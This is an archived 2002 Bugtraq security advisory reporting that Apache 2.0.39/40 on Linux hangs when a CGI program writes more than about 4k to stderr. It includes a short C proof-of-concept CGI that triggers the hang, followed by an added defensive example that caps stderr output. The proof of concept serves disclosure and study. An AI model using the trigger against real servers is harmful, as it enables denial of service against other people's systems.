Apache 2.0.(39|40) DOS (PHP!)

From: shaddup@hush.com
Date: 09/23/02


Date: Mon, 23 Sep 2002 12:33:04 -0700
To: bugtraq@securityfocus.com
From: shaddup@hush.com


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -=~=-_-=~=-_-=~=-
I put PHP in the title so I know this message will reach the "sekur1ty c0mmun1ty", that *knows* that PHP is bad, because it's easy to write insecure applications, unlike C.
- -=~=-_-=~=-_-=~=-
Problem:
 o Apache 2.0 (.39 and .40 tested) on Linuxx0r (and possibly other OS's)
 will hang on a write to stderr that is larger than the default buffer
 size (4k on Linux)
Impact:
 o Local users can cause apache's httpd process to hang
 o Possible new DoS to look for in web apps that write
 user input to stderr!
Tested on:
 o Linux (RedHat)
 o FreeBSD (did not show a problem, but not well tested)
Notification:
 o The Apache Projekt was contacted July 9th, 2002
   (http://nagoya.apache.org/bugzilla/show_bug.cgi?id=10515)

- -=~=-_-=~=-_-=~=-
Sample Code
- -=~=-_-=~=-_-=~=-
// Credit to: K.C. Wong
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <time.h>
#include <unistd.h>
#include <fcntl.h>

#define SIZE 4075

void out_err()
{
        char buffer[SIZE];
        int i = 0;

        for (i = 0; i < SIZE - 1; ++i)
                buffer[i] = 'a' + (char )(i % 26);

        buffer[SIZE - 1] = '\0';

        // Disabled in the sample: stderr stays in blocking mode, so the large write below can block.
        // fcntl(2, F_SETFL, fcntl(2, F_GETFL) | O_NONBLOCK);

        fprintf(stderr, "short test\n");
        fflush(stderr);

        fprintf(stderr, "test error=%s\n", buffer);
        fflush(stderr);
} // out_err()

int main(int argc, char ** argv)
{
        fprintf(stdout, "Content-Type: text/html\r\n");
        fprintf(stdout, "\r\n\r\n");
        out_err();
        fprintf(stdout, "<HTML>\n");
        fprintf(stdout, "<body>\n");
        fprintf(stdout, "<h1>hello world</h1>\n");
        fprintf(stdout, "</body>\n");
        fprintf(stdout, "</HTML>\n");
        fflush(stdout);
        exit(0);
} // main()

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlgEARECABgFAj2Pa0MRHHNoYWRkdXBAaHVzaC5jb20ACgkQ8iAl114OGrxaHwCgsmGs
262aOmBHEUw01ktoAADRIz0AoJOdidtdbVswjjp0sqn1uHW+EQCT
=8PKT
-----END PGP SIGNATURE-----
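
An application-side guard for the "web apps that write user input to stderr" case raised in the advisory, as an added example that is not part of the original post: it caps the total bytes a CGI program sends to stderr below the 4k buffer the advisory cites and replaces control characters in logged input. The names `ERR_BUDGET`, `format_bounded` and `log_err_bounded` and the 2048-byte cap are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Assumption: per-process cap, kept well under the 4k buffer cited above. */
#define ERR_BUDGET 2048

static size_t err_used = 0;   /* bytes already sent to stderr by this process */

/* Copy msg into out (cap bytes), replacing control characters with '?' and
 * truncating so the running total never exceeds ERR_BUDGET. A newline is
 * appended. Returns bytes placed in out (0 once the budget is spent). */
size_t format_bounded(const char *msg, char *out, size_t cap)
{
    size_t left = ERR_BUDGET - err_used;
    size_t n = 0;

    if (left < 2 || cap < 2)
        return 0;
    if (cap < left)
        left = cap;
    while (msg[n] != '\0' && n < left - 1) {
        unsigned char c = (unsigned char)msg[n];
        out[n] = (c < 0x20 || c == 0x7f) ? '?' : (char)c;
        n++;
    }
    out[n++] = '\n';
    err_used += n;
    return n;
}

/* Write one bounded log line to stderr; returns bytes written, 0 or -1. */
long log_err_bounded(const char *msg)
{
    char line[ERR_BUDGET];
    size_t n = format_bounded(msg, line, sizeof line);

    return n == 0 ? 0 : (long)write(STDERR_FILENO, line, n);
}

int main(void)
{
    char big[5000];                       /* constructed oversized input */

    memset(big, 'a', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    log_err_bounded("short test");
    log_err_bounded(big);                 /* truncated to the remaining budget */
    printf("stderr bytes used: %zu of %d\n", err_used, ERR_BUDGET);
    return 0;
}
```
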
